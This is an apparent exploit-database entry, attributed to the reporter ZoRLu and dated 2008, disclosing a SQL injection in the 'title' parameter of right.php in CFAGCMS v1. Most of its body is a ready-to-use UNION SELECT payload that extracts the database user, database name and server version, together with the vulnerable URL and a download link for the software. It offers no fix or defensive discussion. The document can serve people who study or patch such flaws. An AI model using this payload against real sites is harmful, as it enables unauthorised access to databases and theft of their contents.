CFAGCMS v1 (right.php title) SQL Injection Vulnerability

2008-12-15T00:00:00
ID 1337DAY-ID-4471
Type zdt
Reporter ZoRLu
Modified 2008-12-15T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ========================================================
CFAGCMS v1 (right.php title) SQL Injection Vulnerability
========================================================


cfagcms Beta 1 sql inj.
 
download: http://mesh.dl.sourceforge.net/sourceforge/cfagcms/cfagcms.zip
 
Discovered By: ZoRLu

date: 23.10.2008
 
N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
------------------------------------------------------------------
 
exploit:
 
http://localhost/cfagcms/right.php?title=[SQL]
 
[SQL]=
 
ZoRLu'+union+select+0,concat(user(),0x3a,database(),0x3a,version()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
 
------------------------------------------------------------------



#  0day.today [2018-04-03]  #